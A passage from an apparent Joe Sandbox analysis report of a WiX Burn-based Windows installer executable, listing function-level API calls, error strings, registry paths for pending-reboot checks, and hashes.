                                                                                                                                                                  • RegCloseKey.ADVAPI32(009331C1,009331C1,009331C1,00020019,00000000,00916CF2,00020019,009331C1,00000000,00916CF2,-80000001,00000000,009331C1,009331C1,00916CF2), ref: 00975CA9
                                                                                                                                                                    • Part of subcall function 0096CC5E: RegQueryInfoKeyW.ADVAPI32(?,009271DB,00916DEA,00917162,00916EDE,80000002,SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations,00020019,00000000,00916DEA,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,PendingFileRenameOperations2,00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager), ref: 0096CC85
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get the number of values under the dependency "%ls"., xrefs: 00975C09
                                                                                                                                                                  • Failed to delete the dependents subkey under the dependency "%ls"., xrefs: 00975BD9
                                                                                                                                                                  • Failed to open root registry key "%ls"., xrefs: 00975A34
                                                                                                                                                                  • Failed to delete the dependency "%ls"., xrefs: 00975C62
                                                                                                                                                                  • Failed to get the number of dependent subkeys under the dependency "%ls"., xrefs: 00975B77
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp, xrefs: 00975A43, 00975B49
                                                                                                                                                                  • Failed to open the dependents subkey under the dependency "%ls"., xrefs: 00975AE9
                                                                                                                                                                  • Failed to delete the dependent "%ls" under the dependency "%ls"., xrefs: 00975B3A
                                                                                                                                                                  • Failed to open the registry key for the dependency "%ls"., xrefs: 00975A95
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close$InfoQuery
                                                                                                                                                                  • String ID: Failed to delete the dependency "%ls".$Failed to delete the dependent "%ls" under the dependency "%ls".$Failed to delete the dependents subkey under the dependency "%ls".$Failed to get the number of dependent subkeys under the dependency "%ls".$Failed to get the number of values under the dependency "%ls".$Failed to open root registry key "%ls".$Failed to open the dependents subkey under the dependency "%ls".$Failed to open the registry key for the dependency "%ls".$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\deputil.cpp
                                                                                                                                                                  • API String ID: 852846383-1164676106
                                                                                                                                                                  • Opcode ID: 810caa8171648681d9a96d1cd82e854b07c834b2aaba68815a465e4b5c8df807
                                                                                                                                                                  • Instruction ID: 2dafffd78d249dfeec66acf14259f22a6d64b44926c0425115656a0513725632
                                                                                                                                                                  • Opcode Fuzzy Hash: 810caa8171648681d9a96d1cd82e854b07c834b2aaba68815a465e4b5c8df807
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E710933E40B29FBDB725E948C8AF7F7A6C9B40710F1B8679B949BA150D2B48D40D6D0
                                                                                                                                                                  Function 0097A8DE Relevance: 24.7, APIs: 3, Strings: 11, Instructions: 249COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0091540B: GetProcessHeap.KERNEL32(?,00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0091541C
                                                                                                                                                                    • Part of subcall function 0091540B: RtlAllocateHeap.NTDLL(00000000,?,00915532,00000000,00000001,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00915423
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0097AB27
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0097AB36
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0097AB45
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get unknown element name., xrefs: 0097A9BA
                                                                                                                                                                  • Failed to enumerate all attributes on ATOM unknown element., xrefs: 0097AADE
                                                                                                                                                                  • Failed to allocate ATOM unknown element name., xrefs: 0097A9DF
                                                                                                                                                                  • Failed to allocate ATOM unknown element namespace., xrefs: 0097A968
                                                                                                                                                                  • Failed get attributes on ATOM unknown element., xrefs: 0097AA59
                                                                                                                                                                  • Failed to get unknown element value., xrefs: 0097AA03
                                                                                                                                                                  • Failed to parse attribute on ATOM unknown element., xrefs: 0097AAF2
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 0097A90C, 0097A917, 0097A92C, 0097A977
                                                                                                                                                                  • Failed to allocate unknown element., xrefs: 0097A91D
                                                                                                                                                                  • Failed to allocate ATOM unknown element value., xrefs: 0097AA2B
                                                                                                                                                                  • Failed to get unknown element namespace., xrefs: 0097A989
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString$Heap$AllocateProcess
                                                                                                                                                                  • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM unknown element name.$Failed to allocate ATOM unknown element namespace.$Failed to allocate ATOM unknown element value.$Failed to allocate unknown element.$Failed to enumerate all attributes on ATOM unknown element.$Failed to get unknown element name.$Failed to get unknown element namespace.$Failed to get unknown element value.$Failed to parse attribute on ATOM unknown element.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp
                                                                                                                                                                  • API String ID: 2724874077-2936770743
                                                                                                                                                                  • Opcode ID: 545b26ceb384580910cd12f17fe82ade180a5c3c353fc793e6a9c3b24a50fd1f
                                                                                                                                                                  • Instruction ID: ea9472dc9a218c771acd9b4904d8f2e9efde43d3638a0510e69220241af881b5
                                                                                                                                                                  • Opcode Fuzzy Hash: 545b26ceb384580910cd12f17fe82ade180a5c3c353fc793e6a9c3b24a50fd1f
                                                                                                                                                                  • Instruction Fuzzy Hash: EA81BF32740715ABDB159B50CC49F6E77B9AFC4B18F128058F609BB2E0EBB09E41CB52
                                                                                                                                                                  Function 0091E48B Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 223processCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 0091E651
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0091E65B
                                                                                                                                                                  • WaitForInputIdle.USER32(?,?), ref: 0091E6BF
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0091E708
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0091E71A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$CreateErrorIdleInputLastProcessWait
                                                                                                                                                                  • String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$d:\a\wix4\wix4\src\burn\engine\approvedexe.cpp
                                                                                                                                                                  • API String ID: 1086122317-1885568646
                                                                                                                                                                  • Opcode ID: 978d0f688995e7e19200799b375a0d68e5162277480fd396da0c6a4d0d4cb175
                                                                                                                                                                  • Instruction ID: 79ff7bcd2f21a9a656243c6818d61d3fca2f41618d1e6fbc392c86f9a8766db4
                                                                                                                                                                  • Opcode Fuzzy Hash: 978d0f688995e7e19200799b375a0d68e5162277480fd396da0c6a4d0d4cb175
                                                                                                                                                                  • Instruction Fuzzy Hash: AF71B272F4021DBBEF12AB90CC46FEEBA79AF04744F004555FE14B62A1E7719E909B90
                                                                                                                                                                  Function 0095027A Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 214fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,08000080,00000000,?,?,?,?,00000000,00000000), ref: 00950334
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00950342
                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000002,08000080,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 009503E5
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 009503F3
                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,Function_0003FC40,?), ref: 009504C1
                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 009504D0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to open destination file to copy payload from: '%ls' to: %ls.$Failed to open source file to copy payload from: '%ls' to: %ls.$Failed to prepare payload destination path: %ls$Failed to read from start of source file to copy payload from: '%ls' to: %ls.$copy$d:\a\wix4\wix4\src\burn\engine\apply.cpp
                                                                                                                                                                  • API String ID: 2528220319-2964528259
                                                                                                                                                                  • Opcode ID: 45a3f7b6570dfa929473c54c8a16180e938ac145a271eb2b33def32d2c97b8c6
                                                                                                                                                                  • Instruction ID: 308baa586134f5e1922e8958696fd1c75ab373ceaf6101f13dd5e0b8499bccf2
                                                                                                                                                                  • Opcode Fuzzy Hash: 45a3f7b6570dfa929473c54c8a16180e938ac145a271eb2b33def32d2c97b8c6
                                                                                                                                                                  • Instruction Fuzzy Hash: A3514E32B4131977E7318A5A8C4AFAF3968EFC5B61F114548FE18BF1D1E2B49C4187A0
                                                                                                                                                                  Function 0091D84A Relevance: 24.7, APIs: 2, Strings: 12, Instructions: 173COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00916570,?,?,0091E2FF,feclient.dll,?,00000000,00000000,?,?,?,00916C5C,00000000), ref: 0091D854
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0091E2FF,feclient.dll,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 0091D860
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHandleLastModule
                                                                                                                                                                  • String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$clbcatq.dll$d:\a\wix4\wix4\src\burn\engine\section.cpp
                                                                                                                                                                  • API String ID: 4242514867-3704064587
                                                                                                                                                                  • Opcode ID: f5943ae8b8ea6d0f297d12aca0f57a9e55e6eb35c4cb6f74da5842603a384a9c
                                                                                                                                                                  • Instruction ID: 59268c292bb3ce06cdcb2a040d50515980e31ce6f1f17aff2025fea75e06b2c5
                                                                                                                                                                  • Opcode Fuzzy Hash: f5943ae8b8ea6d0f297d12aca0f57a9e55e6eb35c4cb6f74da5842603a384a9c
                                                                                                                                                                  • Instruction Fuzzy Hash: ED517731742318B7D721A6494C4AFEBA5A89F95F24F218029F6196F3C1E2F49D81C7A4
                                                                                                                                                                  Function 0092F013 Relevance: 23.1, APIs: 2, Strings: 11, Instructions: 385COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0091A8A3: EnterCriticalSection.KERNEL32(00917D5B,WixBundleOriginalSource,?,?,0092F8B4,8D4BE800,WixBundleOriginalSource,?,00000001,00000081,00917D5B,?,00000001,00917DDB,?,?), ref: 0091A8AF
                                                                                                                                                                    • Part of subcall function 0091A8A3: LeaveCriticalSection.KERNEL32(00917D5B,00917D5B,00000000,00000000,?,?,0092F8B4,8D4BE800,WixBundleOriginalSource,?,00000001,00000081,00917D5B,?,00000001,00917DDB), ref: 0091A934
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,WixBundleLastUsedSource,?), ref: 0092F087
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,?,WixBundleLastUsedSource,?), ref: 0092F0A4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareCriticalSectionString$EnterLeave
                                                                                                                                                                  • String ID: Failed to combine last source with relative.$Failed to combine last source with source.$Failed to combine layout source with relative.$Failed to combine layout source with source.$Failed to combine source process folder with relative.$Failed to combine source process folder with source.$Failed to copy absolute source path.$Failed to ensure size for search paths array.$WixBundleLastUsedSource$WixBundleOriginalSourceFolder$d:\a\wix4\wix4\src\burn\engine\cache.cpp
                                                                                                                                                                  • API String ID: 1408779843-2177830281
                                                                                                                                                                  • Opcode ID: 3ea5929473a2ffee5962f11618e3980ccb3c17a6eb83660ac8dab552015fbb0f
                                                                                                                                                                  • Instruction ID: a108b79290b84345e095d5af399fd67cab86e4ddaa9d8b6170bae7d98b760bfc
                                                                                                                                                                  • Opcode Fuzzy Hash: 3ea5929473a2ffee5962f11618e3980ccb3c17a6eb83660ac8dab552015fbb0f
                                                                                                                                                                  • Instruction Fuzzy Hash: 73D19F31A80229FBDF21DE50DC5AFEE7AB5AB48720F110175FA04BA2D5D3B4AD40CB91
                                                                                                                                                                  Function 00972C90 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 259fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00973B63: GetFileSizeEx.KERNEL32(00000000,00000000,?,00000000,?,?,?,0091E202,0100147D,?,?,00000000,00000000), ref: 00973B7B
                                                                                                                                                                    • Part of subcall function 00973B63: GetLastError.KERNEL32(?,?,?,0091E202,0100147D,?,?,00000000,00000000,?,?,?,00916C5C,00000000,00916570), ref: 00973B85
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,00950457,?,00000000,00000000,?,?,00950457,00000000,00000000,00000000,00000000), ref: 00972DAF
                                                                                                                                                                  • SetEndOfFile.KERNEL32(?,?,00950457,00000000,00000000,00000000,00000000,Function_0003FC40,?), ref: 00972DBB
                                                                                                                                                                  • GetLastError.KERNEL32(?,00950457,00000000,00000000,00000000,00000000,Function_0003FC40,?), ref: 00972DC5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorLast$PointerSize
                                                                                                                                                                  • String ID: Failed to get size of source.$Failed to read from source.$Failed to reset target file pointer.$Failed to set end of target file.$Failed to write to target.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\fileutil.cpp
                                                                                                                                                                  • API String ID: 1903691966-2291708945
                                                                                                                                                                  • Opcode ID: 639f679022280e432608a36da5afe7e5fc32c4e872f0ca3c4afa88fe7fa3e200
                                                                                                                                                                  • Instruction ID: 42d55a7089880675705480fe9e3691a6c34efa2302897c2a1504667bd9229fa5
                                                                                                                                                                  • Opcode Fuzzy Hash: 639f679022280e432608a36da5afe7e5fc32c4e872f0ca3c4afa88fe7fa3e200
                                                                                                                                                                  • Instruction Fuzzy Hash: CD914272A2022D9BDB328B148C45FEE76B9EF4C740F118095F98DA6294D6B09EC19F94
                                                                                                                                                                  Function 009556C2 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 241COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy download source for pseudo bundle., xrefs: 00955812
                                                                                                                                                                  • Failed to copy id for update bundle., xrefs: 00955917
                                                                                                                                                                  • Failed to allocate space for burn payload group inside of update bundle struct, xrefs: 009556FA
                                                                                                                                                                  • Failed to copy install arguments for update bundle package, xrefs: 0095596A
                                                                                                                                                                  • Failed to allocate space for burn payload inside of update bundle struct, xrefs: 0095573E
                                                                                                                                                                  • Failed to decode hash string: %ls., xrefs: 0095585C
                                                                                                                                                                  • Failed to copy local source path for pseudo bundle., xrefs: 009557DC
                                                                                                                                                                  • Failed to copy cache id for update bundle., xrefs: 00955940
                                                                                                                                                                  • Failed to allocate memory for update bundle payload hash., xrefs: 009558AC
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\pseudobundle.cpp, xrefs: 009556E7, 009556F2, 0095570C, 0095572B, 00955736, 0095586E, 00955899, 009558A4, 0095597C
                                                                                                                                                                  • Failed to copy filename for pseudo bundle., xrefs: 009557B1
                                                                                                                                                                  • Failed to copy key for pseudo bundle payload., xrefs: 00955786
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                                  • String ID: Failed to allocate memory for update bundle payload hash.$Failed to allocate space for burn payload group inside of update bundle struct$Failed to allocate space for burn payload inside of update bundle struct$Failed to copy cache id for update bundle.$Failed to copy download source for pseudo bundle.$Failed to copy filename for pseudo bundle.$Failed to copy id for update bundle.$Failed to copy install arguments for update bundle package$Failed to copy key for pseudo bundle payload.$Failed to copy local source path for pseudo bundle.$Failed to decode hash string: %ls.$d:\a\wix4\wix4\src\burn\engine\pseudobundle.cpp
                                                                                                                                                                  • API String ID: 1357844191-2400517205
                                                                                                                                                                  • Opcode ID: 8cea4391d249b918bf4de3c9ff19382c2e4e6c9a365dde5becc340395c89ecee
                                                                                                                                                                  • Instruction ID: f716950d1ab51d99d0a77f41acd4b502a048ca1d265a54556341c307bf8a64f6
                                                                                                                                                                  • Opcode Fuzzy Hash: 8cea4391d249b918bf4de3c9ff19382c2e4e6c9a365dde5becc340395c89ecee
                                                                                                                                                                  • Instruction Fuzzy Hash: E471C971740B15BBEB21DF698C56FDB7A98EB48B25F020115BE04BB2C1E3B4D85487D1
                                                                                                                                                                  Function 0093D137 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 160COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0097699C: FindResourceExA.KERNEL32(?,0000000A,?,00000000), ref: 009769AD
                                                                                                                                                                    • Part of subcall function 0097699C: GetLastError.KERNEL32(?,0093D16B,?,00000001,?,?), ref: 009769B9
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000001,?,?), ref: 0093D2CD
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?), ref: 0093D2E2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$ErrorFindLastResource
                                                                                                                                                                  • String ID: Failed to create UI thread.$Failed to create modal event.$Failed to load splash screen configuration.$Failed to read splash screen configuration resource.$Invalid splash screen type: %i$d:\a\wix4\wix4\src\burn\engine\splashscreen.cpp
                                                                                                                                                                  • API String ID: 3960716503-2387003162
                                                                                                                                                                  • Opcode ID: 5678d288bf486aebfb5d522d022ae78a22e2def60eb31692c6ab809b2de3c2fb
                                                                                                                                                                  • Instruction ID: cd1b7fb1e63d935e3e3392a9714026991430915390659632558cd93bc46d3a37
                                                                                                                                                                  • Opcode Fuzzy Hash: 5678d288bf486aebfb5d522d022ae78a22e2def60eb31692c6ab809b2de3c2fb
                                                                                                                                                                  • Instruction Fuzzy Hash: 5E410876A40709BBEB119BA89C46FDF77BDEB88714F100425FA24B72C0E6B4CD408E60
                                                                                                                                                                  Function 009270DA Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 111registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0096CAFE: RegCloseKey.ADVAPI32(00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,00927102,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,00916EDE,00000000), ref: 0096CB9B
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00916DEA,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending,00000000,00000000,80000002,SOFTWARE\Microsoft\Updates,UpdateExeVolatile,00000000,00916EDE,80000002,SOFTWARE\Microsoft\ServerManager,CurrentRebootAttempts,00000000,00916EDE,00000000), ref: 009271F8
                                                                                                                                                                  Strings
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update, xrefs: 00927169
                                                                                                                                                                  • PendingFileRenameOperations2, xrefs: 00927196
                                                                                                                                                                  • SOFTWARE\Microsoft\ServerManager, xrefs: 009270EF
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootPending, xrefs: 00927133
                                                                                                                                                                  • SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\RebootInProgress, xrefs: 0092714A
                                                                                                                                                                  • SOFTWARE\Microsoft\Updates, xrefs: 00927119
                                                                                                                                                                  • PendingFileRenameOperations, xrefs: 0092717F
                                                                                                                                                                  • CurrentRebootAttempts, xrefs: 009270EA
                                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00927184, 0092719B
                                                                                                                                                                  • UpdateExeVolatile, xrefs: 00927114
                                                                                                                                                                  • AUState, xrefs: 00927164
                                                                                                                                                                  • SYSTEM\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 009271B6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
